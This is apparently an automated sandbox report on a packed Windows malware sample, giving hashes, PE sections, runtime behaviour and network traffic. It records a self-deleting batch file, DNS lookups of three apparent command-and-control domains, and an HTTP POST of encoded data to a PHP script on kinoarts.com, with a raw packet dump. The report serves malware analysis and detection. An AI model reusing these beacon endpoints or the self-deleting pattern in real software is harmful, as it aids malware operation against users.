Analysis Date2014-08-30 19:57:18
MD51352ee89979cb9799d16c015fb06757e
SHA17cfab672f5bb832da7c1eeacc471a54cf327a710

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.f77c md5: 096ad0b95bfcdfbbba7533d71ad8200f sha1: 0cdb72c2c580c57d1a7580b6c1e2a04630f4c781 size: 20480
Section.4bfb md5: 909054c02e20cb1ff698f8f15f43dde4 sha1: 7bdc25769ddd6f003a3626508dca8a1b696fff8a size: 18432
Section.607da md5: e3c084b308d418cc3f0f11bfb7dbfa7e sha1: 61d29b616adbdff9b5ec6382d11d21d06d77bc7e size: 59904
Section.eggf7 md5: 1f3218f010e21daff6a342958e1611e9 sha1: 014189da0832fb941c3df602c562bbd04bf0dbdc size: 2560
Section.rsrc md5: d54841d9af01dc42e12eac3695135d87 sha1: d46887ba57c2d48f5f33dc5f32e9ff92452f01f5 size: 2048
Timestamp2007-03-26 01:37:41
PackerPEX v0.99
PEhash4cf598c5444f620febfa02ec77fe0b2194ab9d29
IMPhashb23e0c1007332cf323f349238b4c2775

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates Filenul
Deletes FileC:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat

Network Details:

DNSkinoarts.com
Type: A
192.31.186.4
DNSpetroartsstudio.com
Type: A
DNSgreeartsday.com
Type: A
HTTP POSThttp://kinoarts.com/oermb.php?data=v26MmjSySdSkDDR07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzfIyRtufRrKX/Mftpu+7vlQ==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6f65 726d622e 7068703f   POST /oermb.php?
0x00000010 (00016)   64617461 3d763236 4d6d6a53 79536453   data=v26MmjSySdS
0x00000020 (00032)   6b444452 30374155 5952724d 3759372f   kDDR07AUYRrM7Y7/
0x00000030 (00048)   75493945 384f6459 49535830 694c4273   uI9E8OdYISX0iLBs
0x00000040 (00064)   4f575161 48324258 61795433 77425533   OWQaH2BXayT3wBU3
0x00000050 (00080)   43634658 65676379 55763834 554b5169   CcFXegcyUv84UKQi
0x00000060 (00096)   424d4634 59476d4c 7a664979 52747566   BMF4YGmLzfIyRtuf
0x00000070 (00112)   52724b58 2f4d6674 70752b37 766c513d   RrKX/Mftpu+7vlQ=
0x00000080 (00128)   3d204854 54502f31 2e310d0a 41636365   = HTTP/1.1..Acce
0x00000090 (00144)   70743a20 2a2f0d0a 436f6e74 656e742d   pt: */..Content-
0x000000a0 (00160)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000b0 (00176)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000c0 (00192)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000d0 (00208)   656e743a 20776765 7420332e 300d0a48   ent: wget 3.0..H
0x000000e0 (00224)   6f73743a 206b696e 6f617274 732e636f   ost: kinoarts.co
0x000000f0 (00240)   6d0d0a43 6f6e7465 6e742d4c 656e6774   m..Content-Lengt
0x00000100 (00256)   683a2031 32310d0a 436f6e6e 65637469   h: 121..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   756a6e54 33324f2f 46397173 4479417a   ujnT32O/F9qsDyAz
0x00000150 (00336)   36566c4d 53373533 502f5834 664d4d78   6VlMS753P/X4fMMx
0x00000160 (00352)   5239304e 43436f33 64553143 4857445a   R90NCCo3dU1CHWDZ
0x00000170 (00368)   30306543 32487932 62537947 51305854   00eC2Hy2bSyGQ0XT
0x00000180 (00384)   31702f57 2f5a4961 4a6b2b4f 6444417a   1p/W/ZIaJk+OdDAz
0x00000190 (00400)   42324b36 4c746d52 314c6143 2f716e39   B2K6LtmR1LaC/qn9
0x000001a0 (00416)   49756b36 2b373233 7757612f 536b5472   Iuk6+723wWa/SkTr
0x000001b0 (00432)   48413d3d                              HA==


Strings
.
m
U

B6CG4D7
CCDE1HA
DH63
E431EED
E7DH2
G9F1CE
GGH3B5
HB9AB
HD0AHE
	RC_RCDATA
RC_RCDATA2
RC_RCDATA3
RC_RCDATA4
0c/rz7*
1S/oW)
`.4bfb
4hPq6h
4Tk9	3
.607da
6dcfff2abedgbf9bga980g4h046
740gf909675h89hh79gcgc1da92a26482a4d04e3gb2f0cdh1fh8d167a86gd5bfd2d0h8
8b7b6fc2aheadgg39d0f212g7678c6f53865c1h8886aag9f4dhgf5c589e27eb889c11ef84g27804cc
92c1aebhbf3884cg1ga7ea32hh4c9ff40hcbf33f906ffb1856ca5
aAQt2|
advapi32.dll
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
c304he3551ccda27g05b0c92055c6bda36g555
CopyFileExA
 dD63b
`ddqa&
DeleteFileA
DeleteFileW
$eF(<w
@.eggf7
ExitThread
FlushFileBuffers
FormatMessageA
FreeResource
g3gc10fe70ba09ef0d56f1c6602de46h1bf29
\g6U"-
GetCommandLineA
GetFileTime
GetFileType
GetLastError
GetPriorityClass
GetStdHandle
GetWindowTextA
h51X*5
HeapFree
iJ	ZiK
IsMenu
[)jilS
JPADl4
j+S`7(
$K}-)\
kernel32.dll
lstrcmpA
lstrlenA
M5Kh)i
ny!`]>
OpenFile
OpenFileMappingA
:P/%)4
q5<u)*
RegCreateKeyA
RegCreateKeyW
RegDeleteValueA
RegEnumKeyA
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExA
RegQueryValueW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
@.rsrc
      </security>
      <security>
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
WriteFile
x9 !PQ?
X	Buh_$
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
x;)ZGh
	yqIAY